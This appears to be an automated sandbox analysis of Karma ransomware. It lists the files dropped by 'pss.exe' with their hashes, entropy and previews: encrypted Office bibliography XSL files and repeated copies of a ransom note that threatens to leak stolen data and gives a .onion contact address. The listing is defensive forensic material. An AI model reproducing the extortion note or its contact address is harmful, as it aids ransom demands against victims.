Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Adobe\LogTransport2\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\AddIns\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl
Process:C:\Users\user\Desktop\pss.exe
File Type:Dyalog APL mapped file 32-bit version 246.248
Category:dropped
Size (bytes):333671
Entropy (8bit):7.999411716359313
Encrypted:true
SSDEEP:6144:iC58nTaO8FSkZSv4xtIbbubuFZofOHAfob9LZWTf35QFjRHQImmmz2F9RQe32QO:Ma3ZcRbvFZGEbeTf35QFj+2C2zP29
MD5:5EE366E680A23D033F0E975E84F5CABD
SHA1:5015466CEC47A7D181BA22958593498F58E7FA73
SHA-256:147107D67F324D9298D2651B0A1B8466AC9D61C43613EEE17FA381A11A2FD0D0
SHA-512:C64E03B73F132C4BBD387FA120FE0A7D4667BF905BD6EE714D139882223373951E84046ADF2D60BBEDC512CCB4330FC21C29453FBC9AAA2C3B25D31E20C93AF3
Malicious:true
Preview: ....P._p..E...j..U...9...........I.......m.....;.0.ou..n.O...KARMA.XGXV.A..]....L.u,Z...O.&2*.z."_Ed..S...3.@.$.TB..W.9.!khg.U,-..M..c..:...X.3..m...po..{..E..;..h(.]v._y..........K.FH...|......id...#...^.*H^zx.].#<....^..e.mL...OP7x8[..J..TZ...U..n.........N....{.g...c..B...,M#A@....#..kj.YK.^.g..l.....p...0..Bq.Tr.G..6...bi...#zk.8...;Cd..h.3?4.;.\6u..MP...k..........P.^..a]...+.E1.a.wn:G...gh.../...p.......x'......^z4qs.....>I...!..v.....PZql.%3yRD........i`+^..\...j}?.G.=.e.....[......'..e...7(^4......pqK..$........O.....y....:.O..#..Z3._.C-%.Fg"..".?6..s..$.i..6.-Q.(-....<.le...iC...~U...$0i/..>..$j...C#..K%.KR...J.)y....T.<o...bY...3m/..............F...c.8.j.S.a...D.."M^-.....\.a..)....n<.d.....pDi."..,.w_k...v...e.QW.t4b..,...........u...?..3..euq.#..h..ETq...BS.....j....>]ex....~..x..}l....{El.~.s.nbF.X...A...A..m..}..../.../......O$....d!..e..+.:.....wYC..H6.w...~....U..Y.mns..Pi2u|..9..+90..P.n.F...?......7/...?......j3...
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):297086
Entropy (8bit):7.999349226696064
Encrypted:true
SSDEEP:6144:fytb6yOflV2OO3L8vyGGc8s8Gc/BiCgKmCOF02v+1QmAwlThuevH7p+mnYyEfg:G6yOfS78VGcGngK7OecC/F51cg
MD5:F18105FC1CC880CAB30822FC0AA2FB6E
SHA1:837B8CFC5528A6C102C51EF32E3DE7440FB35536
SHA-256:4EF9463BC695CDC4CA3D4A60E36A8443C3EA6B8729D3BB63794C5F7343514B20
SHA-512:DA3B73FBF07CC32E8C9ADA1ECD03DB52AD5643563DA54AC71451449A70F79DA9098088C19CCE154C3FDAD4AD80EC882E0E2DD6197FA93319E85C57DE33AAC5FA
Malicious:true
Preview: ...\;.w.....3`..li.....~..c......O[.....H/..TwY.l.........KARMA...ehy...:kR..u...z..&.Gd...w2w.{~......Z.d.x...v.=....2K.k03.4M!gK.....N/6&...9W.tS...>M....F.3...y_X .mUN.`M.5.xu,.....A.@k.A...*.q.#.^<....o.Y.E.wJ.|.J2.(p..Y......d.\.C\..r.......r*..gD'z..._.......5#%..\.['..,#.ze^G....8......n.@g..O... .d/2t.="...m..P;........9{._.c..m;@&..c*t..3.0.P...*.....m<t%..B.....P..Z..&..cC....,....w*Mq....K..).G.;.E.#We....i}...1.?B:n.la.X.w..M....^.K....qO...>.......gp.s..]:.i=..... Ow.T.K.....i...pY.-.N.=.........>$p...0.E..k./f./F...E..d...."..>:%.Y.y&..:k?}a.pWj7.....1.w._.._9n..4@.!....#K.Ln?......c&...9.f.........Z2..1..z.!9.EH@.-..C.......vF...X'....!@.......O...u."....Dc.<...J.....]...G#.f...._...).i.-.Mb.;.....E..D..9<.bH.3:....AhQ...c..M:...... .C.]0.\.L.?7^]..T.l.|3.5..Z.'..J...K.o...t...8m'...9q!..b..9...e..|9?`.U..N...5.R!:...$$G|..)..,.K.8..,V.{.j$2XO.y.. ..q;5.A.....;....5.y..Z<.D...m...bg.Nmlb..a.5....3...5.,...E..^.......
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):268739
Entropy (8bit):7.999374762502691
Encrypted:true
SSDEEP:6144:+MBAq/ODsKghS+L5Ghr5vU+ExZlOJAorlY5GMLguvjD:+TMeghghGZlGDxYP0urD
MD5:503CC4377FCEE9A24FF9BB56BCBF65B5
SHA1:F9DD696DF51F11B836D2C3D5B3175A7E9EE8664E
SHA-256:229E30E038556F808367748DE9302F6A5A10E5ED3E8A9C2D9FEC1C4DDB859CA2
SHA-512:8A53DBB3381430E4733E660D39F03A97A438B2E45A0DA8EFF5058776D4DBBCEA530B18C7BF655FEF4A4D3BF8F74F7C483C0A1F007E12870BE951F9FA909632AD
Malicious:true
Preview: G@I.x(.....Lh..h.d.f........S..}...._.^S.9.\..W....(9'+.....KARMA.B6:!..TN8..........V~.Z..H..m.R..p...&s.Y.l.....8....@E...}....BN..{Z.R..H.Dqo.O..J.......Wf.@..I[...$..za].m....o.q........~.h,......9.-.......Y...S.<./....e.X........|.{.-...r...,6 .$......-p..^....._s.g.t...9o...`g..@..E..?....i.......G...{Qr=...E.......RT.>.z`.e.Kr..M........ ...?...tKl......m<PV......miO...2..... ....6.....I.6... .>..f.......O...Z].:....6.E]Lvp...........GL.....`..w......2w...p.....N...AbK4".#*.*-.S..'...a7G...K.....V.V.%.^D...c........4....q..0.).'.....R.....!.....G...~Z.9...@..1(._{.p..........V{.A>."....$E..y3.A..9..`.i.R.+..?..Mv..<R...<5NuJ..H....%Z......2/e. .i.Q.n.MY..,_E.......T..vR+N.W._E.{..iIU.k!],.!._e'rMGv.a.G...WG:.?q..}#..%]..J....O....E8x.w.F.>..j....>X.J..+.<6d..UO.ME.3...:].|)..s.1cV.m.@h.b..k.x.b.....N.q....Ab..{>.[ue..w&....)>0.4..v*.....`..`...8..@.....*plQ....2..<....,jD.(g.in...._jO.|.[....tW;f...4....2Wl@Mus~.vT...q(Tu.@
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):256427
Entropy (8bit):7.999256064752385
Encrypted:true
SSDEEP:6144:Qu7OKJN8xHRaFVpM0WO83y50rVAyloDS9/FyFhbi2d18e:pOBHg7TWhyur2yloW/g+s18e
MD5:D95370244700D7A9BB9AA12E6B4A0179
SHA1:316F0B4CD045CDB994DEBC41E2E5E9196E819656
SHA-256:C2E0B5BA837B101FBB82136543C636C57210CD608F3AB59A5FF7DE77CFE5E500
SHA-512:5102E14FDD8C97BDEDCA80750361A42B6D954EF7D45E858430E91E284E9D819251AAFAABB95C5226F6ECC8494DE9818600A24929400CD7963FC3380F8D06ED4D
Malicious:true
Preview: h.....b.JB=..k'./q.R...,$'......s..tiG......7a.k.Hv......KARMA..U...G%...L.~[9..2P......g-...;...k.cO.;.b.b...S.p.3.h......9..gUoxF1..X6......Dn..1.....). .I.<e.M.*O...`W1.Xs.....F.\+.a.]1y.u.x..7o.n..|...L.i..I.Q..F.Y%r..2..J.1.z<.d..d..<t.V..~k..(..N..*G>...h....J....z&-..[...t...@-...y).J&4..*..R.3.A2...D.....`2....h...8...2.g....aS.I..1Y.<..a.=...f....2.\...'..l<..uT..Z:c`^U3.[..a>..&...0...h.\.H.MUTL..$b.'.S....o..B....1..jE<..H}...|R!....bDM...h..pw..z..s..sd..Y....H.rD.)..r.4t..vo..h...-......]/s..[...V...x..._AK....X..bE..(6D...NJ.&.y.8.b....0I..r...xG.....A...wt.@./...l.E.y.&.9..%..+["<=..A....rFL..^TX.H.,.q..E(..~^q1...!pFu.@j4*.n|;/c`h.M.iF..l..z`..........Z..Yo."./P...@]o..^i.Z|).c{...x.V(.Knt.....Z...$^[.%.]..O.....f......B7..3.....R..a....;.|..*.]p.(m....uT..I.XK...P..5h..E....)...r`..`....i..Sycl.l..;...Z.L..qF+...c..."..N3.s..>.0..w'........H6]F.......J.i...J...9.`.k..&..x.T4..#.....,.. .....8.....N..xP.j...A.v....CKDH......
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):251518
Entropy (8bit):7.999383827401665
Encrypted:true
SSDEEP:6144:Wwnqx5ofZjF7pAG+Wm6vzuRtOB+ugYxoEjsXQ/ZOwgEdxlTW251U:WXx5MJF7iYEOB+uH7sg/9xBpI
MD5:66C90CE9DC264B54C9DD174A1CDED7F4
SHA1:5E6C3B6DE3C68CF67B7BB11D6DA03848D17E10D7
SHA-256:3B3758AC0F2AD447AB851DD02496769A8A827D132A4761C3108E19488FEA49B6
SHA-512:2013253BFD3F0AC66450A391BB11BB3E95C7DC118DE8F1E38859C6BD4DAF54FCB32D9747E92473710108ADEEFE75BD10E171379A2791DA0F523CF175A7B43DC4
Malicious:true
Preview: Y........X.A....W.nM.~.yP.g...b..&..g...k...`*.DE..P2...S[i...KARMA.J,.....q..3.. c|..'...I.B.((.]9.......$..D....w........F#7&,...^N....C.PQ7U[Q...v\.kC......WM..M.C%.......f...2."..s.\...Q.P."A...O......w.Ep.....\'G.0.aa.~1.....K...Q.H.....\..+..=~.O..2B..?...Q..9...;.<i.Q.2..........<...D.P./..E...3.5t.?.]b........N.....y...q...1.bBy".=D.#BS..x....@..b..q?p...=<2s.6..CX.8.._..i...WAB49.......I.....$...<...d.\.ut.v}.....;..x...X....._.....o..y.VP1.@...>.....$O9.i.;.y ......NTi..:.X.&2o4..o.m..r@~...\..".....u.^..e...%...}|\...R..m.e<...,.....r@Zh]y..zS...d...d....7..H?.\6oZ..D}..#...p12~...u......c.{.....s....d.r5.......N.$....Q(~.....(.....+^..%>...6.0...B....W....~B.1.I...c....o........d....../>.vP.....V..2... .n.Ug/...i]I.9l!FG..S<.B5".^..8.KV.Y..k.(..c..'.=.......KB....M..:.66......Yba.^.....X...@1\>D..K..7....q.d.Y.$g:GN".S..K.........>w:...a......k...kJ.5i..]$.<..=.s....gS...ZA.~...n..Kg^....Q..V...#.A.j.....C.[.cIT-]=.q.....
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):284871
Entropy (8bit):7.99924388201897
Encrypted:true
SSDEEP:6144:TtD8ARsB2tQNHwok+IBqyHwLGyWM8X2qUWL3170HlmONeMCYDeBn:TKAuu5oZIBqy6GytGJ0HlmIc
MD5:F4BBDD6CD7E032CD312D35232A3FCC8A
SHA1:B70EB878D86CE4D2D8A1E05BF8144EC02466ACDD
SHA-256:7EAD398F5B22612495EDEDFB40143E8C0E093E61F0EDE08686F2872C75F6AF48
SHA-512:2D5B8905FD1396D182212CB0865D23AC1B89AF751DB3AD44D870FD52B824511A8F1F5E1FF6D90DBC09867E95398AB6457241B0ABBFD14BC99167D36E2CB37A8F
Malicious:true
Preview: o..,.=`.....C.@R..\.t.WL...4.^.Rm.Bg.#...I[...9/.%...L.5...KARMA.f....I......l..d..op.y.q.b.<.....D..)"...[H..od...)G...=.B.HEg:V2l=.b!....I..-.I..u. ....JaA._...hY..Q..J..C..pM.2.}e.C..d.o.N...q7.[.%P.c..Y...Y..c.......7.....Bu.{.]...Th..........x..j-..p.......4..&......H....ht...pedJT.1.!...q...%.8...u"C.Vb...q]..%0E..X4SQ...=.9.+eU....u...zk0..[.8di.6h...zK.yq~ih..K......u~.............<...wD.Kb...Zu.%.^H...g.x...^s?R..,..w..&.f8-...&k\.......l......B.....th~.9...L...<..{...k?.a/....i-..G{..Y........Z.ZM...G(.s.u.7...@......y..KY...b..V...)........q..;.gee...D9z...^.gk.NV......?..yc)..OV.1.{.y.=q..|.,*.bA..*Xx..iz..5......Uo....aH.4..z...(....E..$.'[.zly.:jEh.......R.M.c.#n6?.Y.o._..).z...B...@...Q.o...#t6.q..j.[...u..lJ....,'..S .............]\.sCL.V.....po.f@.....O....`..Po.&kYG.H2..<y~...{#r-f..mV..+....O?..I..T..w3..k.......Spc.lC.aZ...F.vq.j...e.W......v.9.....8e..o..U..}.....Y..<..W....6.-3.....|..D.0&{FoZbiS...
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):294594
Entropy (8bit):7.999487811845438
Encrypted:true
SSDEEP:6144:0yqVoy7rRbpEh8ROw1e9N+y0EJADmsqzt:0JnxpAfMot
MD5:68C73707485E803B2ACF276FD155E5AB
SHA1:581F5787BC2B00B42FE08EFBC2D7BBD7F2ABB71D
SHA-256:6FE27FC470D84A273EC26DA173E310DB00D93F538A948A56E4019D6F543DF19C
SHA-512:5AD5178A33C70296701E65A1121E5D9FC21E99B8BFC1FE540D389A1B732614E4C0CDB83A961CF428C1957231C0E19DDCB041160AA3FDE3F34B26661601599815
Malicious:true
Preview: V@.....7?7$Ej.~r0Y.H....NA.......q...R5..-...j..C.s.n..Y......KARMA....1..-Q...3.w...c!....+1?u..9...0XX.....k..5..A..+W.....).....}.:.n.E.$..f.."...m...*..d.'N.y.*......g>......Z.j...OR..w,..|..m.|...wH...y.<.....*!j.3v..4........s6?..x*q.....e.0...I.g...{....Wr.....1..g1..... 7....i....E...eQ.@.Z.-.a..7......Z......t.....:q...3..4Fq.6%UV.b....R[.nNR..x.md.j....`H.!.q.}.l...#4!..:...8f..3OC.....{.........e..d.`.&..#....U.Z. 8o..?...`....}Rb.#..&...O.(..."k..Aj.x..i.G.....$v#......#5C...._..........{.);....V.Px.........!.C#..K?...xPr.....3."..5..A$..E..m.F..e..Kw.R#G.../......X.zf.OY..7Z..[.r..7.T.;..a,..pF.zf.Wuh........2............[....~.".......D..\........$4.I.5.is_.....5}al[..I..B..9_.,.$K}}..B....,......b..._3..mT...Z...f.b.20...B'W.2.....H.z.Bv..e.?..?.Wb........T..e6..D*..hFo.h.`HE.....i^...z..8n1.8q.T..;.#>^..g.b..^....Ppq..v...t}B...V..'....DNr.....x...p..%.d.0.`[\..*....sr......)a.(...........[F.*Gg.d.....Ga..........e.V...
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):270711
Entropy (8bit):7.999111205500655
Encrypted:true
SSDEEP:6144:FakIS3RxlWxmvwoWZFUU6GOb0zn/ZmKv8R+TNNmgVdEL:FDIS3RxlkmvwPUfGOinBmKUiNN9VA
MD5:072C0F26EC1928B84B985A9D902FBAEF
SHA1:11227E021031C735C330135CDDE3DFB351599B7C
SHA-256:AD50AF309BBFC221FBB95F73CA7EE1385AB17FF0EC48C25C289C1C33C1DF95B1
SHA-512:07DE2354340410427055FE5B7CDA973B0C4658F1FBFE777A928D3E7D70BF431C43D3FA2A05E6F7155EF52463FC25C3A801A837D1B459F1D52947FCACC80E5F62
Malicious:true
Preview: ........^$.cNRqwOV.H...'.........>.{...>..e.%.E...@]...5.rf....KARMA6@9cao.5$.........x~_.......tK.._.O.f.c*m....i.....~.MVQ."...L.O6....a....b..^a...g.:...M-.^+z...ubH^.....OL..Ir.3...'V.pa\..gh..?.l.k..0gH\.44...+[U..Q....Bsk......'.(............4.....(...Rs...).....y.........'..V.>..+L.*.X....}..^c.......4.j...ovp2..//......T#^.~aH].xZ.g.&...9.y......K_*w{o...F`o....@.`e.>q _....tHQT........W..t.;.C......{.r.....D..p..rj.pk.s.Qv.eO.1.1 ..oA/....jn...E.&f.h.n.-..L.............t\|a./.q.E.~......_.Cd..GY....."...f..W.......1.`....p+C...6..J.s.v...t.V<gb..`..QW.....x..K......0.M.Ln\SW&Hm..v'.-..I~D....ZR.k...... .....>...A6.....7\.T...#..w..A.<5^:..zk...S.....7.(../`._=1.-02.wZ>..$.'.Ud.D.......{..0.\A..VIi.s.6...!.....s..O./Q...);.k..{_.+....<;2.e....aq....?..^.....L......"..i.Yq...VJK.^..9....l.U.....2G...2...E ..W.la..x.<..]........&m.......'..R5..H..=>..n.....}......q.#....9....{R...X.....d.....Y2\0t.....S:GJ.Z?>.....,X
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):217647
Entropy (8bit):7.999060804982078
Encrypted:true
SSDEEP:6144:EhoqsheNF97OvaofjEeLhnxOhrL7ErdvNzSovyPehvhkhnhObbR:EhoZeenLqh7EruoKPehwnhObbR
MD5:E540715341631B8E1D0F33FDFCEDAD1C
SHA1:1C897C6653B9C79C84DD10C3DEDFED3956807E91
SHA-256:5459707C0CF38C54989578A85E7019F8D9559C75DC93425528387A2EF42135DA
SHA-512:6ED12A47A58C47A1B7BAB6EDC04A73487836C49C13C2AF2782F37DD273A5362027EDDBF13D084BAABAD62B495BCEECB9E61AC449186D94D14678E1E2F82D7FE7
Malicious:true
Preview: .^C.3.h.z:.Nr$.uf.d;.........z.,.J....I;.R.n...bE...|..m...KARMA.....Uq..K;.G.m(L.GL6M..]&k...2h..._o8i..{....#.\.?/.q.=...i..9y..K...x..(.s%k..rIRmy..(..+.p.}}g|"..BG?...S....v.....&...JkI0v...=.o(#O.i.h...a....B..@@.U...)..._u.Sp..?p.p!..Q..m.....qQ..o<...S.7.....!qv.7.`.`.1.14....q.O......bZ~`UA.m}....../.r..r.5..n...Tb...wQz.P.#?.0.....p...V...b93Q..ce.Q...X.t7...:...6}"...*. ...wX.,.....]...Z.....{.&....rD ...5..z.K 8|...}K.O..I..D..I:NH.JFg.xC.H.a...V}....@....-.......S.*...JZ...[.........W.C".=5..0...~.6..>...`.m...)...t8....i..+w..iW.p..K.1..Dx.|.1;.NN/..R.......].Q...........-........k.....X...[.~6O.<...e...;#.....0...e..HW...q..n..N..9MI...../..=..R..^.T.....XwB9!QR.s.&...x....n.i......b.9..'n..5g.]./.........S..XF?S$O.a..sV.P.G".......=..JX._c....).'W$S.r...^..;.^.....l....^.5n....7.K.l...c.5...........<.2..ZEWS]..b.*.z.0.q...klSx.rCj.....A.......?........2.D........GB...._.....=...<vg.."zx...'...d81R...UF.J?s}#,.....s..
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):255288
Entropy (8bit):7.999364255656324
Encrypted:true
SSDEEP:6144:ujSpLTcBvjRtpniDlG/+3TzXoPxE/ai+Eum48eDMT:u+RcdDpnixG23aQVFum48OMT
MD5:6F24CAFE0253E43ACC6468777E71AC2D
SHA1:3CBAF92D63F601B01276EB34C202CB7E2F35DBD9
SHA-256:F11D6B244525A59517BEB256699139C722F654964E3D19C175BD3201EB9623C8
SHA-512:1BD610D6116B06A8CB1297F8D2664720E5721F3FEEA23BF2FE31166803D0DC654F41E78E7BB34ED34987381E227DE98E563182DE64CE71D09F7285A122E329F1
Malicious:true
Preview: k.q)'..0....H..v.LP.y..%.q..../(p...?.....$Z..q..x....P..M...KARMA-F..x..........+....lX..+.*v.t..Mp.V....6....1.!...>.....5\+.Q%y.l.c....h.eKk.........".....'..}...\.0g.......MNA.14&..'3.*..u*.S..y..T.E.....o.X..a...:+)....-.m....}."....e.Z.eA........@. ..-........[.....gn.....e...:........... d..."....M..!..^.Fn0c..Ge.*N..x.1..)....>.;..vW.PF$.%...ceu.....$U.v.q....T.?..I.T{..O=y.g?.EZ.e.}...~.Y4.-..;.45".+...%.8...k1i..p.......cI)F.}..i&Q...;P.....-..9.....=...../....|.U.kP..@.../..C.KwaB.[-....1.J.%..'V.Q>k:.b...7SO.O.......=.{..2.N.Kz.....J.....*.p....,7.#Qk.<b... Y.....)m..j.]@O.....e.G.Z.C@.|.X.1.,b......G....w..{..{.z....m.C.....A..xYS.DK.f.W..B...=F.....Ig.].4.......C..N. .e....c.W..S`..]...;......?.'f^..N...j..B....\.>..9....U9.l..ML.N.<(:...h.ps..K.3f..[.`*p.2..U...a...q...}3........Y.f.$....qt...}......9.......r.gs!.V......`p.B.......D....XV....r....3N.^.s......n..E3.(...........s[.\~t..(....cX..A......A...D.9,5.O..l...k..3..
C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):251405
Entropy (8bit):7.999389953090911
Encrypted:true
SSDEEP:6144:3ZNOAg/W/CAzVVgXd4RSiGoctWq4Ebt+GueR:pNOu/BVyKadcq4jGueR
MD5:77A395D277A8C281B7F26871CF8FF924
SHA1:86CF072DC3A3BFFB0266012994E0F1B9C31B0D21
SHA-256:16D81764438D5DBD12D4F1CBC806250B57E184106B89F7817A5CACCEE1814E17
SHA-512:EE41EFC6B38C59404B1611D0DCEE9945ADD7DEAF575B891C9C89D7679B72F9127EC985ED8D0971F6547B05CA1168CC9279421C7153997BE1378DE770368F61B2
Malicious:true
